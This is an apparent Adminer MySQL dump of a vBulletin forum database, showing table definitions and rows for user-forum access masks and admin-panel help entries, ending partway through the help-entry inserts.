-- Adminer 4.1.0 MySQL dump
SET NAMES utf8;
SET time_zone = '+00:00';
SET foreign_key_checks = 0;
SET sql_mode = 'NO_AUTO_VALUE_ON_ZERO';
DROP TABLE IF EXISTS `access`;
CREATE TABLE `access` (
`userid` int(10) unsigned NOT NULL DEFAULT '0',
`forumid` smallint(5) unsigned NOT NULL DEFAULT '0',
`accessmask` smallint(5) unsigned NOT NULL DEFAULT '0',
PRIMARY KEY (`userid`,`forumid`)
) ENGINE=InnoDB DEFAULT CHARSET=latin1;
INSERT INTO `access` (`userid`, `forumid`, `accessmask`) VALUES
(2, 1, 0),
(2, 2, 0),
(2, 4, 0),
(2, 6, 0),
(2, 7, 0),
(2, 9, 0),
(2, 10, 0),
(2, 11, 0),
(2, 13, 0),
(2, 14, 0),
(2, 15, 0),
(2, 16, 0),
(2, 17, 0),
(2, 18, 0),
(2, 24, 0),
(386, 1, 1),
(386, 2, 1),
(386, 4, 1),
(386, 6, 1),
(386, 7, 1),
(386, 9, 1),
(386, 10, 1),
(386, 11, 1),
(386, 13, 1),
(386, 14, 1),
(386, 15, 1),
(386, 16, 1),
(386, 17, 1),
(386, 18, 1),
(386, 24, 1),
(386, 31, 1),
(386, 32, 1),
(386, 35, 1),
(386, 36, 1),
(386, 37, 1),
(386, 38, 1),
(386, 39, 1),
(388, 1, 1),
(388, 2, 1),
(388, 4, 1),
(388, 6, 1),
(388, 7, 1),
(388, 9, 1),
(388, 10, 1),
(388, 11, 1),
(388, 13, 1),
(388, 14, 1),
(388, 15, 1),
(388, 16, 1),
(388, 17, 1),
(388, 18, 1),
(388, 24, 1),
(388, 31, 1),
(388, 32, 1),
(388, 35, 1),
(388, 36, 1),
(388, 37, 1),
(388, 38, 1),
(388, 39, 1);
DROP TABLE IF EXISTS `adminhelp`;
CREATE TABLE `adminhelp` (
`adminhelpid` int(10) unsigned NOT NULL AUTO_INCREMENT,
`script` varchar(50) NOT NULL DEFAULT '',
`action` varchar(25) NOT NULL DEFAULT '',
`optionname` varchar(100) NOT NULL DEFAULT '',
`displayorder` smallint(5) unsigned NOT NULL DEFAULT '1',
`volatile` smallint(5) unsigned NOT NULL DEFAULT '0',
`product` varchar(25) NOT NULL DEFAULT '',
PRIMARY KEY (`adminhelpid`),
UNIQUE KEY `phraseunique` (`script`,`action`,`optionname`)
) ENGINE=InnoDB DEFAULT CHARSET=latin1;
INSERT INTO `adminhelp` (`adminhelpid`, `script`, `action`, `optionname`, `displayorder`, `volatile`, `product`) VALUES
(3327, 'accessmask', '', '', 1, 1, 'vbulletin'),
(3328, 'accessmask', 'edit', '', 1, 1, 'vbulletin'),
(3329, 'accessmask', 'modify', '', 1, 1, 'vbulletin'),
(3330, 'accessmask', 'quickedit', '', 1, 1, 'vbulletin'),
(3331, 'accessmask', 'resetall', '', 1, 1, 'vbulletin'),
(3332, 'admincalendar', '', '', 1, 1, 'vbulletin'),
(3333, 'admincalendar', 'add', '', 1, 1, 'vbulletin'),
(3334, 'admincalendar', 'add,edit', 'title', 20, 1, 'vbulletin'),
(3335, 'admincalendar', 'add,edit', 'displayorder', 40, 1, 'vbulletin'),
(3336, 'admincalendar', 'add,edit', 'customfields', 50, 1, 'vbulletin'),
(3337, 'admincalendar', 'add,edit', 'neweventemail', 60, 1, 'vbulletin'),
(3338, 'admincalendar', 'add,edit', 'moderatenew', 70, 1, 'vbulletin'),
(3339, 'admincalendar', 'add,edit', 'daterange', 75, 1, 'vbulletin'),
(3340, 'admincalendar', 'add,edit', 'default', 76, 1, 'vbulletin'),
(3341, 'admincalendar', 'add,edit', 'startofweek', 80, 1, 'vbulletin'),
(3342, 'admincalendar', 'add,edit', 'cutoff', 90, 1, 'vbulletin'),
(3343, 'admincalendar', 'add,edit', 'eventcount', 100, 1, 'vbulletin'),
(3344, 'admincalendar', 'add,edit', 'birthdaycount', 110, 1, 'vbulletin'),
(3345, 'admincalendar', 'add,edit', 'showbirthdays', 120, 1, 'vbulletin'),
(3346, 'admincalendar', 'add,edit', 'showholidays', 130, 1, 'vbulletin'),
(3347, 'admincalendar', 'add,edit', 'holidays', 135, 1, 'vbulletin'),
(3348, 'admincalendar', 'add,edit', 'showweekends', 140, 1, 'vbulletin'),
(3349, 'admincalendar', 'add,edit', 'showupcoming', 145, 1, 'vbulletin'),
(3350, 'admincalendar', 'add,edit', 'allowhtml', 150, 1, 'vbulletin'),
(3351, 'admincalendar', 'add,edit', 'allowbbcode', 160, 1, 'vbulletin'),
(3352, 'admincalendar', 'add,edit', 'allowimgcode', 170, 1, 'vbulletin'),
(3353, 'admincalendar', 'add,edit', 'allowsmilies', 180, 1, 'vbulletin'),
(3354, 'admincalendar', 'addcustom', '', 1, 1, 'vbulletin'),
(3355, 'admincalendar', 'addcustom', 'title', 20, 1, 'vbulletin'),
(3356, 'admincalendar', 'addcustom', 'description', 25, 1, 'vbulletin'),
(3357, 'admincalendar', 'addcustom', 'options', 30, 1, 'vbulletin'),
(3358, 'admincalendar', 'addcustom', 'allowentry', 40, 1, 'vbulletin'),
(3359, 'admincalendar', 'addcustom', 'length', 50, 1, 'vbulletin'),
(3360, 'admincalendar', 'addcustom', 'required', 60, 1, 'vbulletin'),
(3361, 'admincalendar', 'addmod', '', 1, 1, 'vbulletin'),
(3362, 'admincalendar', 'addmod', 'modusername', 30, 1, 'vbulletin'),
(3363, 'admincalendar', 'addmod,editmod', 'calendarid', 20, 1, 'vbulletin'),
(3364, 'admincalendar', 'addmod,editmod', 'caneditevents', 40, 1, 'vbulletin'),
(3365, 'admincalendar', 'addmod,editmod', 'candeleteevents', 50, 1, 'vbulletin'),
(3366, 'admincalendar', 'addmod,editmod', 'canmoveevents', 55, 1, 'vbulletin'),
(3367, 'admincalendar', 'addmod,editmod', 'canmoderateevents', 60, 1, 'vbulletin'),
(3368, 'admincalendar', 'addmod,editmod', 'canviewips', 70, 1, 'vbulletin'),
(3369, 'admincalendar', 'deletecustom', '', 1, 1, 'vbulletin'),
(3370, 'admincalendar', 'edit', '', 1, 1, 'vbulletin'),
(3371, 'admincalendar', 'editmod', '', 1, 1, 'vbulletin'),
(3372, 'admincalendar', 'modify', '', 1, 1, 'vbulletin'),
(3373, 'admincalendar', 'modifyholiday', '', 1, 1, 'vbulletin'),
(3374, 'admincalendar', 'remove', '', 1, 1, 'vbulletin'),
(3375, 'admincalendar', 'removeholiday', '', 1, 1, 'vbulletin'),
(3376, 'admincalendar', 'removemod', '', 1, 1, 'vbulletin'),
(3377, 'admincalendar', 'updateholiday', '', 1, 1, 'vbulletin'),
(3378, 'admincalendar', 'updateholiday', 'description', 1, 1, 'vbulletin'),
(3379, 'admincalendar', 'updateholiday', 'varname', 10, 1, 'vbulletin'),
(3380, 'admincalendar', 'updateholiday', 'title', 20, 1, 'vbulletin'),
(3381, 'admincalendar', 'updateholiday', 'event', 30, 1, 'vbulletin'),
(3382, 'admincalendar', 'updateholiday', 'recurring', 40, 1, 'vbulletin'),
(3383, 'admincalendar', 'updateholiday', 'allowsmilies', 50, 1, 'vbulletin'),
(3384, 'admininfraction', '', '', 1, 1, 'vbulletin'),
(3385, 'admininfraction', 'editbangroup', 'amount', 10, 1, 'vbulletin'),
(3386, 'admininfraction', 'editbangroup', 'method', 20, 1, 'vbulletin'),
(3387, 'admininfraction', 'editbangroup', 'usergroupid', 30, 1, 'vbulletin'),
(3388, 'admininfraction', 'editbangroup', 'banusergroupid', 50, 1, 'vbulletin'),
(3389, 'admininfraction', 'editbangroup', 'period', 60, 1, 'vbulletin'),
(3390, 'admininfraction', 'editgroup', '', 1, 1, 'vbulletin'),
(3391, 'admininfraction', 'editgroup', 'override', 1, 1, 'vbulletin'),
(3392, 'admininfraction', 'editgroup', 'pointlevel', 2, 1, 'vbulletin'),
(3393, 'admininfraction', 'editgroup', 'usergroupid', 10, 1, 'vbulletin'),
(3394, 'admininfraction', 'editgroup', 'orusergroupid', 30, 1, 'vbulletin'),
(3395, 'admininfraction', 'editlevel', 'title', 1, 1, 'vbulletin'),
(3396, 'admininfraction', 'editlevel', 'expires', 5, 1, 'vbulletin'),
(3397, 'admininfraction', 'editlevel', 'points', 7, 1, 'vbulletin'),
(3398, 'admininfraction', 'editlevel', 'warning', 10, 1, 'vbulletin'),
(3399, 'admininfraction', 'editlevel', 'extend', 15, 1, 'vbulletin'),
(3400, 'admininfraction', 'modify', '', 1, 1, 'vbulletin'),
(3401, 'adminlog', '', '', 1, 1, 'vbulletin'),
(3402, 'adminlog', 'choose', '', 1, 1, 'vbulletin'),
(3403, 'adminlog', 'choose', 'enddate', 1, 1, 'vbulletin'),
(3404, 'adminlog', 'choose', 'startdate', 1, 1, 'vbulletin'),
(3405, 'adminlog', 'choose', 'perpage', 20, 1, 'vbulletin'),
(3406, 'adminlog', 'choose', 'script', 30, 1, 'vbulletin'),
(3407, 'adminlog', 'choose', 'userid', 40, 1, 'vbulletin'),
(3408, 'adminlog', 'choose', 'orderby', 50, 1, 'vbulletin'),
(3409, 'adminlog', 'choose', 'pscript', 60, 1, 'vbulletin'),
(3410, 'adminlog', 'choose', 'puserid', 70, 1, 'vbulletin'),
(3411, 'adminlog', 'choose', 'daysprune', 80, 1, 'vbulletin'),
(3412, 'adminlog', 'prunelog', '', 1, 1, 'vbulletin'),
(3413, 'adminlog', 'resolveip', '', 2, 1, 'vbulletin'),
(3414, 'adminlog', 'restrict', '', 1, 1, 'vbulletin'),
(3415, 'adminlog', 'view', '', 1, 1, 'vbulletin'),
(3416, 'adminpermissions', '', '', 1, 1, 'vbulletin'),
(3417, 'adminpermissions', 'edit', '', 1, 1, 'vbulletin'),
(3418, 'adminpermissions', 'edit', 'canadminmodlog', 1, 1, 'vbulletin'),
(3419, 'adminpermissions', 'edit', 'dismissednews', 1, 1, 'vbulletin'),
(3420, 'adminpermissions', 'edit', 'canadminsettings', 20, 1, 'vbulletin'),
(3421, 'adminpermissions', 'edit', 'canadminstyles', 30, 1, 'vbulletin'),
(3422, 'adminpermissions', 'edit', 'canadminlanguages', 40, 1, 'vbulletin'),
(3423, 'adminpermissions', 'edit', 'canadminforums', 50, 1, 'vbulletin'),
(3424, 'adminpermissions', 'edit', 'canadminthreads', 60, 1, 'vbulletin'),
(3425, 'adminpermissions', 'edit', 'canadmincalendars', 70, 1, 'vbulletin'),
(3426, 'adminpermissions', 'edit', 'canadminusers', 80, 1, 'vbulletin'),
(3427, 'adminpermissions', 'edit', 'canadminfaq', 90, 1, 'vbulletin'),
(3428, 'adminpermissions', 'edit', 'canadminpermissions', 90, 1, 'vbulletin'),
(3429, 'adminpermissions', 'edit', 'canadminimages', 100, 1, 'vbulletin'),
(3430, 'adminpermissions', 'edit', 'canadminbbcodes', 110, 1, 'vbulletin'),
(3431, 'adminpermissions', 'edit', 'canadmincron', 120, 1, 'vbulletin'),
(3432, 'adminpermissions', 'edit', 'canadminmaintain', 130, 1, 'vbulletin'),
(3433, 'adminpermissions', 'edit', 'canadminplugins', 135, 1, 'vbulletin'),
(3434, 'adminpermissions', 'edit', 'canadminnotices', 136, 1, 'vbulletin'),
(3435, 'adminpermissions', 'edit', 'cssprefs', 140, 1, 'vbulletin'),
(3436, 'adminpermissions', 'modify', '', 1, 1, 'vbulletin'),
(3437, 'adminreputation', '', '', 1, 1, 'vbulletin'),
(3438, 'adminreputation', 'add', '', 1, 1, 'vbulletin'),
(3439, 'adminreputation', 'add,edit', 'level', 10, 1, 'vbulletin'),
(3440, 'adminreputation', 'add,edit', 'minimumreputation', 20, 1, 'vbulletin'),
(3441, 'adminreputation', 'deletereputation', '', 1, 1, 'vbulletin'),
(3442, 'adminreputation', 'dolist', '', 1, 1, 'vbulletin'),
(3443, 'adminreputation', 'edit', '', 1, 1, 'vbulletin'),
(3444, 'adminreputation', 'editreputation', '', 1, 1, 'vbulletin'),
(3445, 'adminreputation', 'editreputation', 'reason', 10, 1, 'vbulletin'),
(3446, 'adminreputation', 'editreputation', 'reputation', 20, 1, 'vbulletin'),
(3447, 'adminreputation', 'list', '', 1, 1, 'vbulletin'),
(3448, 'adminreputation', 'list,dolist', 'leftfor', 10, 1, 'vbulletin'),
(3449, 'adminreputation', 'list,dolist', 'leftby', 20, 1, 'vbulletin'),
(3450, 'adminreputation', 'list,dolist', 'start', 30, 1, 'vbulletin'),
(3451, 'adminreputation', 'list,dolist', 'end', 40, 1, 'vbulletin'),
(3452, 'adminreputation', 'modify', '', 1, 1, 'vbulletin'),
(3453, 'adminreputation', 'remove', '', 1, 1, 'vbulletin'),
(3454, 'album', 'storage', '', 1, 1, 'vbulletin'),
(3455, 'album', 'switchtype', 'album_picpath', 1, 1, 'vbulletin'),
(3456, 'album', 'switchtype', 'album_thumbpath', 1, 1, 'vbulletin'),
(3457, 'album', 'switchtype', 'album_thumburl', 1, 1, 'vbulletin'),
(3458, 'album', 'thumb', 'perpage', 1, 1, 'vbulletin'),
(3459, 'album', 'thumb', 'quality', 1, 1, 'vbulletin'),
(3460, 'announcement', '', '', 1, 1, 'vbulletin'),
(3461, 'announcement', 'add', '', 1, 1, 'vbulletin'),
(3462, 'announcement', 'add', 'signature', 120, 1, 'vbulletin'),
(3463, 'announcement', 'add,edit', 'forumid', 20, 1, 'vbulletin'),
(3464, 'announcement', 'add,edit', 'title', 30, 1, 'vbulletin'),
(3465, 'announcement', 'add,edit', 'startdate', 40, 1, 'vbulletin'),
(3466, 'announcement', 'add,edit', 'enddate', 50, 1, 'vbulletin'),
(3467, 'announcement', 'add,edit', 'pagetext', 60, 1, 'vbulletin'),
(3468, 'announcement', 'add,edit', 'allowbbcode', 70, 1, 'vbulletin'),
(3469, 'announcement', 'add,edit', 'allowsmilies', 80, 1, 'vbulletin'),
(3470, 'announcement', 'add,edit', 'allowhtml', 90, 1, 'vbulletin'),
(3471, 'announcement', 'add,edit', 'parseurl', 110, 1, 'vbulletin'),
(3472, 'announcement', 'edit', '', 1, 1, 'vbulletin'),
(3473, 'announcement', 'edit', 'reset_views', 100, 1, 'vbulletin'),
(3474, 'announcement', 'modify', '', 1, 1, 'vbulletin'),
(3475, 'announcement', 'remove', '', 1, 1, 'vbulletin'),
(3476, 'attachment', '', '', 1, 1, 'vbulletin'),
(3477, 'attachment', 'delete', '', 1, 1, 'vbulletin'),
(3478, 'attachment', 'edit', '', 1, 1, 'vbulletin'),
(3479, 'attachment', 'edit', 'upload', 1, 1, 'vbulletin'),
(3480, 'attachment', 'edit', 'url', 1, 1, 'vbulletin'),
(3481, 'attachment', 'edit', 'a_filename', 20, 1, 'vbulletin'),
(3482, 'attachment', 'edit', 'a_counter', 30, 1, 'vbulletin'),
(3483, 'attachment', 'edit', 'a_visible', 40, 1, 'vbulletin'),
(3484, 'attachment', 'intro', '', 1, 1, 'vbulletin'),
(3485, 'attachment', 'intro', 'prunedate', 10, 1, 'vbulletin'),
(3486, 'attachment', 'intro', 'filename', 15, 1, 'vbulletin'),
(3487, 'attachment', 'intro', 'attachedby', 20, 1, 'vbulletin'),
(3488, 'attachment', 'intro', 'datelinebefore', 30, 1, 'vbulletin'),
(3489, 'attachment', 'intro', 'datelineafter', 40, 1, 'vbulletin'),
(3490, 'attachment', 'intro', 'downloadsmore', 50, 1, 'vbulletin'),
(3491, 'attachment', 'intro', 'downloadsless', 60, 1, 'vbulletin'),
(3492, 'attachment', 'intro', 'sizemore', 70, 1, 'vbulletin'),
(3493, 'attachment', 'intro', 'sizeless', 80, 1, 'vbulletin'),
(3494, 'attachment', 'intro', 'visible', 90, 1, 'vbulletin'),
(3495, 'attachment', 'intro', 'orderby', 100, 1, 'vbulletin'),
(3496, 'attachment', 'intro', 'results', 110, 1, 'vbulletin'),
(3497, 'attachment', 'massdelete', '', 1, 1, 'vbulletin'),
(3498, 'attachment', 'removetype', '', 1, 1, 'vbulletin'),
(3499, 'attachment', 'search', '', 1, 1, 'vbulletin'),
(3500, 'attachment', 'stats', '', 1, 1, 'vbulletin'),
(3501, 'attachment', 'storage,switchtype', '', 1, 1, 'vbulletin'),
(3502, 'attachment', 'switchtype', 'attachpath', 1, 1, 'vbulletin'),
(3503, 'attachment', 'types', '', 1, 1, 'vbulletin'),
(3504, 'attachment', 'updatetype', '', 1, 1, 'vbulletin'),
(3505, 'attachment', 'updatetype', 'extension', 10, 1, 'vbulletin'),
(3506, 'attachment', 'updatetype', 'size', 20, 1, 'vbulletin'),
(3507, 'attachment', 'updatetype', 'height', 30, 1, 'vbulletin'),
(3508, 'attachment', 'updatetype', 'width', 40, 1, 'vbulletin'),
(3509, 'attachment', 'updatetype', 'mimetype', 50, 1, 'vbulletin'),
(3510, 'attachment', 'updatetype', 'enabled', 60, 1, 'vbulletin'),
(3511, 'attachment', 'updatetype', 'newwindow', 70, 1, 'vbulletin'),
(3512, 'attachmentpermission', 'edit', 'height', 1, 1, 'vbulletin'),
(3513, 'attachmentpermission', 'edit', 'size', 1, 1, 'vbulletin'),
(3514, 'attachmentpermission', 'edit', 'useextension', 1, 1, 'vbulletin'),
(3515, 'attachmentpermission', 'edit', 'width', 1, 1, 'vbulletin'),
(3516, 'avatar', '', '', 1, 1, 'vbulletin'),
(3517, 'avatar', 'storage,switchtype', '', 1, 1, 'vbulletin'),
(3518, 'avatar', 'switchtype', 'avatarpath', 1, 1, 'vbulletin'),
(3519, 'avatar', 'switchtype', 'avatarurl', 1, 1, 'vbulletin'),
(3520, 'avatar', 'switchtype', 'profilepicpath', 1, 1, 'vbulletin'),
(3521, 'avatar', 'switchtype', 'profilepicurl', 1, 1, 'vbulletin'),
(3522, 'avatar', 'switchtype', 'sigpicpath', 1, 1, 'vbulletin'),
(3523, 'avatar', 'switchtype', 'sigpicurl', 1, 1, 'vbulletin'),
(3524, 'backup', '', '', 1, 1, 'vbulletin'),
(3525, 'backup', 'choose', '', 1, 1, 'vbulletin'),
(3526, 'backup', 'choose', 'filename', 10, 1, 'vbulletin'),
(3527, 'backup', 'choose', 'table', 20, 1, 'vbulletin'),
(3528, 'backup', 'choose', 'separator', 30, 1, 'vbulletin'),
(3529, 'backup', 'choose', 'quotes', 40, 1, 'vbulletin'),
(3530, 'backup', 'choose', 'showhead', 50, 1, 'vbulletin'),
(3531, 'backup', 'mysqldump', '', 1, 1, 'vbulletin'),
(3532, 'banning', '', '', 1, 1, 'vbulletin'),
(3533, 'banning', 'banuser', '', 1, 1, 'vbulletin'),
(3534, 'banning', 'banuser', 'username', 10, 1, 'vbulletin'),
(3535, 'banning', 'banuser', 'usergroupid', 20, 1, 'vbulletin'),
(3536, 'banning', 'banuser', 'period', 30, 1, 'vbulletin'),
(3537, 'banning', 'banuser,editreason', 'reason', 40, 1, 'vbulletin'),
(3538, 'banning', 'modify', '', 1, 1, 'vbulletin'),
(3539, 'bbcode', '', '', 1, 1, 'vbulletin'),
(3540, 'bbcode', 'add', '', 1, 1, 'vbulletin'),
(3541, 'bbcode', 'add,edit', 'title', 10, 1, 'vbulletin'),
(3542, 'bbcode', 'add,edit', 'bbcodetag', 20, 1, 'vbulletin'),
(3543, 'bbcode', 'add,edit', 'bbcodereplacement', 30, 1, 'vbulletin'),
(3544, 'bbcode', 'add,edit', 'bbcodeexample', 50, 1, 'vbulletin'),
(3545, 'bbcode', 'add,edit', 'bbcodeexplanation', 60, 1, 'vbulletin'),
(3546, 'bbcode', 'add,edit', 'twoparams', 70, 1, 'vbulletin'),
(3547, 'bbcode', 'add,edit', 'buttonimage', 80, 1, 'vbulletin'),
(3548, 'bbcode', 'add,edit', 'strip_empty', 90, 1, 'vbulletin'),
(3549, 'bbcode', 'add,edit', 'stop_parse', 100, 1, 'vbulletin'),
(3550, 'bbcode', 'add,edit', 'disable_smilies', 110, 1, 'vbulletin'),
(3551, 'bbcode', 'add,edit', 'disable_wordwrap', 120, 1, 'vbulletin'),
(3552, 'bbcode', 'edit', '', 1, 1, 'vbulletin'),
(3553, 'bbcode', 'modify', '', 1, 1, 'vbulletin'),
(3554, 'bbcode', 'modify', 'text', 20, 1, 'vbulletin'),
(3555, 'bbcode', 'remove', '', 1, 1, 'vbulletin'),
(3556, 'bookmarksite', 'add,edit', 'active', 1, 1, 'vbulletin'),
(3557, 'bookmarksite', 'add,edit', 'displayorder', 1, 1, 'vbulletin'),
(3558, 'bookmarksite', 'add,edit', 'iconpath', 1, 1, 'vbulletin'),
(3559, 'bookmarksite', 'add,edit', 'title', 1, 1, 'vbulletin'),
(3560, 'bookmarksite', 'add,edit', 'url', 1, 1, 'vbulletin'),
(3561, 'bookmarksite', 'modify', '', 1, 1, 'vbulletin'),
(3562, 'calendarpermission', '', '', 1, 1, 'vbulletin'),
(3563, 'calendarpermission', 'edit', '', 1, 1, 'vbulletin'),
(3564, 'calendarpermission', 'edit', 'mode', 20, 1, 'vbulletin'),
(3565, 'calendarpermission', 'edit', 'canviewcalendar', 30, 1, 'vbulletin'),
(3566, 'calendarpermission', 'edit', 'canpostevent', 40, 1, 'vbulletin'),
(3567, 'calendarpermission', 'edit', 'caneditevent', 50, 1, 'vbulletin'),
(3568, 'calendarpermission', 'edit', 'candeleteevent', 60, 1, 'vbulletin'),
(3569, 'calendarpermission', 'edit', 'canviewothersevent', 70, 1, 'vbulletin'),
(3570, 'calendarpermission', 'edit', 'isnotmoderated', 80, 1, 'vbulletin'),
(3571, 'calendarpermission', 'modify', '', 1, 1, 'vbulletin'),
(3572, 'cronadmin', '', '', 1, 1, 'vbulletin'),
(3573, 'cronadmin', 'add', '', 1, 1, 'vbulletin'),
(3574, 'cronadmin', 'add,edit', 'active', 1, 1, 'vbulletin'),
(3575, 'cronadmin', 'add,edit', 'description', 1, 1, 'vbulletin'),
(3576, 'cronadmin', 'add,edit', 'varname', 2, 1, 'vbulletin'),
(3577, 'cronadmin', 'add,edit', 'logphrase', 3, 1, 'vbulletin'),
(3578, 'cronadmin', 'add,edit', 'title', 10, 1, 'vbulletin'),
(3579, 'cronadmin', 'add,edit', 'weekday', 20, 1, 'vbulletin'),
(3580, 'cronadmin', 'add,edit', 'day', 30, 1, 'vbulletin'),
(3581, 'cronadmin', 'add,edit', 'hour', 40, 1, 'vbulletin'),
(3582, 'cronadmin', 'add,edit', 'minute', 50, 1, 'vbulletin'),
(3583, 'cronadmin', 'add,edit', 'loglevel', 60, 1, 'vbulletin'),
(3584, 'cronadmin', 'add,edit', 'filename', 70, 1, 'vbulletin'),
(3585, 'cronadmin', 'edit', '', 1, 1, 'vbulletin'),
(3586, 'cronadmin', 'edit', 'product', 1, 1, 'vbulletin'),
(3587, 'cronadmin', 'modify', '', 1, 1, 'vbulletin'),
(3588, 'cronadmin', 'remove', '', 1, 1, 'vbulletin'),
(3589, 'cronlog', '', '', 1, 1, 'vbulletin'),
(3590, 'cronlog', 'choose', '', 1, 1, 'vbulletin'),
(3591, 'cronlog', 'choose', 'perpage', 20, 1, 'vbulletin'),
(3592, 'cronlog', 'choose', 'varname', 30, 1, 'vbulletin'),
(3593, 'cronlog', 'choose', 'orderby', 40, 1, 'vbulletin'),
(3594, 'cronlog', 'choose', 'daysprune', 60, 1, 'vbulletin'),
(3595, 'cronlog', 'prunelog', '', 1, 1, 'vbulletin'),
(3596, 'cronlog', 'view', '', 1, 1, 'vbulletin'),
(3597, 'css', '', '', 1, 1, 'vbulletin'),
(3598, 'css', 'doedit', '', 1, 1, 'vbulletin'),
(3599, 'css', 'doedit', 'header', 10, 1, 'vbulletin'),
(3600, 'css', 'doedit', 'headinclude', 20, 1, 'vbulletin'),
(3601, 'css', 'doedit', 'footer', 30, 1, 'vbulletin'),
(3602, 'css', 'doedit', 'outertablewidth', 60, 1, 'vbulletin'),
(3603, 'css', 'doedit', 'spacersize', 70, 1, 'vbulletin'),
(3604, 'css', 'doedit', 'outerborderwidth', 80, 1, 'vbulletin'),
(3605, 'css', 'doedit', 'cellspacing', 90, 1, 'vbulletin'),
(3606, 'css', 'doedit', 'cellpadding', 100, 1, 'vbulletin'),
(3607, 'css', 'doedit', 'formspacer', 110, 1, 'vbulletin'),
(3608, 'css', 'doedit', 'formwidth', 120, 1, 'vbulletin'),
(3609, 'css', 'doedit', 'formwidth_usercp', 130, 1, 'vbulletin'),
(3610, 'css', 'doedit', 'messagewidth', 140, 1, 'vbulletin'),
(3611, 'css', 'doedit', 'messagewidth_usercp', 150, 1, 'vbulletin'),
(3612, 'css', 'doedit', 'codeblockwidth', 160, 1, 'vbulletin'),
(3613, 'css', 'doedit', 'titleimage', 170, 1, 'vbulletin'),
(3614, 'css', 'doedit', 'imgdir_button', 180, 1, 'vbulletin'),
(3615, 'css', 'doedit', 'imgdir_statusicon', 190, 1, 'vbulletin'),
(3616, 'css', 'doedit', 'imgdir_attach', 200, 1, 'vbulletin'),
(3617, 'css', 'doedit', 'imgdir_misc', 210, 1, 'vbulletin'),
(3618, 'css', 'doedit', 'imgdir_editor', 220, 1, 'vbulletin'),
(3619, 'css', 'doedit', 'imgdir_poll', 230, 1, 'vbulletin'),
(3620, 'css', 'doedit', 'imgdir_rating', 240, 1, 'vbulletin'),
(3621, 'css', 'doedit', 'htmldoctype', 250, 1, 'vbulletin'),
(3622, 'css', 'doedit', 'imgdir_reputation', 250, 1, 'vbulletin'),
(3623, 'deployads', 'intro', '', 1, 1, 'vbulletin'),
(3624, 'diagnostic', '', '', 1, 1, 'vbulletin'),
(3625, 'diagnostic', 'domail', '', 1, 1, 'vbulletin'),
(3626, 'diagnostic', 'dosysinfo', '', 1, 1, 'vbulletin'),
(3627, 'diagnostic', 'doupload', '', 1, 1, 'vbulletin'),
(3628, 'diagnostic', 'doversion', '', 1, 1, 'vbulletin'),
(3629, 'diagnostic', 'list', '', 1, 1, 'vbulletin'),
(3630, 'diagnostic', 'list', 'attachfile', 20, 1, 'vbulletin'),
(3631, 'diagnostic', 'list', 'emailaddress', 20, 1, 'vbulletin'),
(3632, 'diagnostic', 'list', 'type', 20, 1, 'vbulletin'),
(3633, 'diagnostic', 'payments', '', 1, 1, 'vbulletin'),
(3634, 'email', '', '', 1, 1, 'vbulletin'),
(3635, 'email', 'genlist', '', 1, 1, 'vbulletin'),
(3636, 'email', 'genlist', 'septext', 20, 1, 'vbulletin'),
(3637, 'email', 'genlist,start', 'username', 70, 1, 'vbulletin'),
(3638, 'email', 'genlist,start', 'usergroupid', 90, 1, 'vbulletin'),
(3639, 'email', 'genlist,start', 'membergroup', 100, 1, 'vbulletin'),
(3640, 'email', 'genlist,start', 'adminemail', 105, 1, 'vbulletin'),
(3641, 'email', 'genlist,start', 'email', 110, 1, 'vbulletin'),
(3642, 'email', 'genlist,start', 'parentemail', 120, 1, 'vbulletin'),
(3643, 'email', 'genlist,start', 'coppauser', 130, 1, 'vbulletin'),
(3644, 'email', 'genlist,start', 'homepage', 140, 1, 'vbulletin'),
(3645, 'email', 'genlist,start', 'icq', 150, 1, 'vbulletin'),
(3646, 'email', 'genlist,start', 'aim', 160, 1, 'vbulletin'),
(3647, 'email', 'genlist,start', 'yahoo', 170, 1, 'vbulletin'),
(3648, 'email', 'genlist,start', 'msn', 175, 1, 'vbulletin'),
(3649, 'email', 'genlist,start', 'skype', 177, 1, 'vbulletin'),
(3650, 'email', 'genlist,start', 'signature', 180, 1, 'vbulletin'),
(3651, 'email', 'genlist,start', 'usertitle', 190, 1, 'vbulletin'),
(3652, 'email', 'genlist,start', 'joindateafter', 200, 1, 'vbulletin'),
(3653, 'email', 'genlist,start', 'joindatebefore', 210, 1, 'vbulletin'),
(3654, 'email', 'genlist,start', 'lastactivityafter', 213, 1, 'vbulletin'),
(3655, 'email', 'genlist,start', 'lastactivitybefore', 217, 1, 'vbulletin'),
(3656, 'email', 'genlist,start', 'lastpostafter', 240, 1, 'vbulletin'),
(3657, 'email', 'genlist,start', 'lastpostbefore', 250, 1, 'vbulletin'),
(3658, 'email', 'genlist,start', 'birthdayafter', 260, 1, 'vbulletin'),
(3659, 'email', 'genlist,start', 'birthdaybefore', 270, 1, 'vbulletin'),
(3660, 'email', 'genlist,start', 'postslower', 280, 1, 'vbulletin'),
(3661, 'email', 'genlist,start', 'postsupper', 290, 1, 'vbulletin'),
(3662, 'email', 'genlist,start', 'reputationlower', 300, 1, 'vbulletin'),
(3663, 'email', 'genlist,start', 'reputationupper', 310, 1, 'vbulletin'),
(3664, 'email', 'genlist,start', 'warningslower', 330, 1, 'vbulletin'),
(3665, 'email', 'genlist,start', 'warningsupper', 340, 1, 'vbulletin'),
(3666, 'email', 'genlist,start', 'infractionslower', 350, 1, 'vbulletin'),
(3667, 'email', 'genlist,start', 'infractionsupper', 360, 1, 'vbulletin'),
(3668, 'email', 'genlist,start', 'pointslower', 370, 1, 'vbulletin'),
(3669, 'email', 'genlist,start', 'pointsupper', 380, 1, 'vbulletin'),
(3670, 'email', 'genlist,start', 'useridlower', 390, 1, 'vbulletin'),
(3671, 'email', 'genlist,start', 'useridupper', 395, 1, 'vbulletin'),
(3672, 'email', 'genlist,start', 'ipaddress', 400, 1, 'vbulletin'),
(3673, 'email', 'start', '', 1, 1, 'vbulletin'),
(3674, 'email', 'start', 'test', 20, 1, 'vbulletin'),
(3675, 'email', 'start', 'perpage', 30, 1, 'vbulletin'),
(3676, 'email', 'start', 'from', 40, 1, 'vbulletin'),
(3677, 'email', 'start', 'subject', 50, 1, 'vbulletin'),
(3678, 'email', 'start', 'message', 60, 1, 'vbulletin'),
(3679, 'faq', '', '', 1, 1, 'vbulletin'),
(3680, 'faq', 'add', '', 1, 1, 'vbulletin'),
(3681, 'faq', 'add', 'product', 1, 1, 'vbulletin'),
(3682, 'faq', 'add', 'faq', 5, 1, 'vbulletin'),
(3683, 'faq', 'add,edit', 'faqparent', 10, 1, 'vbulletin'),
(3684, 'faq', 'add,edit', 'deftitle', 20, 1, 'vbulletin'),
